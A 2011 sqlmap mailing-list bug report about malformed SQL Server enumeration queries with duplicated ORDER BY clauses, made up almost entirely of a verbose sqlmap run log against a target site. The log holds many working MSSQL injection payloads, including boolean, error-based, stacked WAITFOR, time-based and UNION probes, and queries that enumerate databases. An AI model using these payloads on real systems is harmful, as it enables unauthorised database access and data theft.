[sqlmap-users] Bug with SQL Server queries
From: David G. <sk...@gm...> - 2011-02-09 12:25:20
There is an error with SQL Server queries, probably in queries.xml? The problem is these two ORDER BY clauses in the query sent to the server (--db, --tables, etc.). I checked it after upgrading to the latest svn revision.

20111' AND 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM master..sysdatabases *ORDER BY 1 ORDER BY name*) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh

[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'ORDER'.

Log:

#./sqlmap.py --cookie "ASPSESSIONIDCABDBSQC=..." -u " http://www.vuln.com/path/default.asp?p=20111" -p p -v 3 --dbs --flush --batch | tee saida.txt

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 09:55:04

[09:55:04] [DEBUG] cleaning up configuration parameters
[09:55:04] [DEBUG] setting the HTTP timeout
[09:55:04] [DEBUG] setting the HTTP Cookie header
[09:55:04] [DEBUG] setting the HTTP method to GET
[09:55:04] [DEBUG] creating HTTP requests opener object
[09:55:04] [WARNING] the testable parameter 'p' you provided is not into the Cookie
[09:55:04] [INFO] using '/path/sqlmap-dev/output/www.vuln.com/session' as session file
[09:55:04] [INFO] flushing session file
[09:55:04] [INFO] testing connection to the target url
[09:55:05] [INFO] testing if the url is stable, wait a few seconds
[09:55:06] [INFO] url is stable
[09:55:06] [PAYLOAD] 20111'(''')"(''
[09:55:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:07] [INFO] heuristic test shows that GET parameter 'p' might be injectable (possible DBMS: Microsoft SQL Server)
[09:55:07] [INFO] testing sql injection on GET parameter 'p'
[09:55:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:55:07] [PAYLOAD] 20111) AND 4197=5111 AND (1965=1965
[09:55:08] [DEBUG] setting match ratio for current parameter to 0.952
[09:55:08] [PAYLOAD] 20111) AND 4255=4255 AND (6152=6152
[09:55:08] [PAYLOAD] 20111 AND 3013=569
[09:55:08] [DEBUG] setting match ratio for current parameter to 0.952
[09:55:08] [PAYLOAD] 20111 AND 4255=4255
[09:55:09] [PAYLOAD] 20111') AND 513=8635 AND ('kiwS'='kiwS
[09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:09] [PAYLOAD] 20111') AND 4255=4255 AND ('ofle'='ofle
[09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:09] [PAYLOAD] 20111' AND 8628=4076 AND 'Jbgn'='Jbgn
[09:55:10] [DEBUG] setting match ratio for current parameter to 0.952
[09:55:10] [PAYLOAD] 20111' AND 4255=4255 AND 'obQa'='obQa
[09:55:10] [PAYLOAD] 20111' AND 9514=9437 AND 'ZUZG'='ZUZG
[09:55:11] [INFO] GET parameter 'p' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[09:55:11] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)' because the payload for boolean-based blind has already been identified
[09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause' because the payload for boolean-based blind has already been identified
[09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)' because the payload for boolean-based blind has already been identified
[09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified
[09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)' because the payload for boolean-based blind has already been identified
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the payload for boolean-based blind has already been identified
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked conditional-error blind queries' because the payload for boolean-based blind has already been identified
[09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[09:55:11] [PAYLOAD] 20111' AND 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl
[09:55:11] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:11] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Parameter replace' because the payload for error-based has already been identified
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the payload for error-based has already been identified
[09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[09:55:11] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos
[09:55:17] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos
[09:55:22] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[09:55:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[09:55:22] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua
[09:55:27] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua
[09:55:33] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)' because the payload for boolean-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' because the payload for boolean-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (ELT - original value)' because the payload for boolean-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL stacked conditional-error blind queries' because the payload for boolean-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL stacked conditional-error blind queries' because the payload for boolean-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'Firebird AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'Firebird OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - Parameter replace' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - Parameter replace' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle error-based - Parameter replace' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'Firebird error-based - Parameter replace' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and ORDER BY clauses' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle error-based - GROUP BY and ORDER BY clauses' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries' because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (heavy query)' because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query)' because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc)' because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle stacked queries (heavy query)' because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP)' because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP)' because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy query)' because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'Firebird stacked queries (heavy query)' because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind (comment)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind (comment)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (comment)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 OR time-based blind' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Firebird OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 1 to 10 columns' because the back-end DBMS identified is Microsoft SQL Server
[09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 11 to 20 columns' because the level is higher than the provided
[09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 21 to 30 columns' because the level is higher than the provided
[09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 31 to 40 columns' because the level is higher than the provided
[09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 41 to 50 columns' because the level is higher than the provided
[09:55:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[09:55:33] [PAYLOAD] 20111' UNION ALL SELECT NULL-- AND 'vrjZ'='vrjZ
[09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL-- AND 'GZNB'='GZNB
[09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL-- AND 'dLhE'='dLhE
[09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND 'XeTw'='XeTw
[09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND 'trjE'='trjE
[09:55:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:36] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND 'rjRE'='rjRE
[09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'vmHq'='vmHq
[09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'ZBcW'='ZBcW
[09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'qhhM'='qhhM
[09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'OaNn'='OaNn
[09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:38] [INFO] target url appears to be UNION injectable with 3 columns
[09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(100)+CHAR(102)+CHAR(99)+CHAR(99) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND 'VYhx'='VYhx
[09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:39] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(102)+CHAR(86)+CHAR(76)+CHAR(122) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'TyzA'='TyzA
[09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:39] [PAYLOAD] 20111' UNION ALL SELECT CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(116)+CHAR(101)+CHAR(83)+CHAR(98) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND 'bKpM'='bKpM
[09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:40] [PAYLOAD] -8546' UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(76)+CHAR(119)+CHAR(88)+CHAR(66) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'HwBz'='HwBz
[09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:40] [PAYLOAD] -2422' UNION ALL SELECT CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(106)+CHAR(68)+CHAR(90)+CHAR(75) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND 'hiSw'='hiSw
[09:55:41] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:41] [PAYLOAD] -9676' UNION ALL SELECT NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(111)+CHAR(120)+CHAR(102)+CHAR(77) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND 'FIBp'='FIBp
[09:55:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 11 to 20 columns' because the level is higher than the provided
[09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 21 to 30 columns' because the level is higher than the provided
[09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 31 to 40 columns' because the level is higher than the provided
[09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 50 columns' because the level is higher than the provided
[09:55:43] [INFO] GET parameter 'p' is vulnerable. Do you want to keep testing the others? [y/N] N
[09:55:43] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
---
Place: GET
Parameter: p
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=20111' AND 4255=4255 AND 'obQa'='obQa

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: p=20111' AND 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: p=20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: p=20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua
---

[09:55:43] [INFO] testing Microsoft SQL Server
[09:55:43] [PAYLOAD] 20111' AND 876=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (BINARY_CHECKSUM(76)=BINARY_CHECKSUM(76)) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'XHDB'='XHDB
[09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:44] [INFO] retrieved: 1
[09:55:44] [DEBUG] performed 1 queries in 0 seconds
[09:55:44] [INFO] confirming Microsoft SQL Server
[09:55:44] [PAYLOAD] 20111' AND 2557=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (HOST_NAME()=HOST_NAME()) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'eONH'='eONH
[09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:44] [INFO] retrieved: 1
[09:55:44] [DEBUG] performed 1 queries in 0 seconds
[09:55:44] [PAYLOAD] 20111' AND 1181=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (XACT_STATE()=XACT_STATE()) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'erPM'='erPM
[09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:44] [INFO] retrieved: 1
[09:55:44] [DEBUG] performed 1 queries in 0 seconds
[09:55:44] [PAYLOAD] 20111' AND 2691=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (SYSDATETIME()=SYSDATETIME()) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ZLNT'='ZLNT
[09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:45] [INFO] retrieved: 1
[09:55:45] [DEBUG] performed 1 queries in 0 seconds
[09:55:45] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008

[09:55:45] [INFO] fetching database names
[09:55:45] [PAYLOAD] 20111' AND 7776=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'IIWR'='IIWR
[09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:45] [INFO] the SQL query used returns 37 entries
[09:55:45] [PAYLOAD] 20111' AND 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh
[09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:46] [PAYLOAD] 20111' AND 5378=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 1 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'nEZn'='nEZn
[09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:46] [PAYLOAD] 20111' AND 3153=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 2 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'PAcn'='PAcn
[09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:47] [PAYLOAD] 20111' AND 2020=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 3 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'KnEl'='KnEl
[09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:47] [PAYLOAD] 20111' AND 8124=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 4 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'vwnC'='vwnC
[09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:48] [PAYLOAD] 20111' AND 5203=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 5 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'SomT'='SomT
[09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:48] [PAYLOAD] 20111' AND 2545=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 6 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'acLW'='acLW
[09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:48] [PAYLOAD] 20111' AND 6353=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 7 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'yXeO'='yXeO
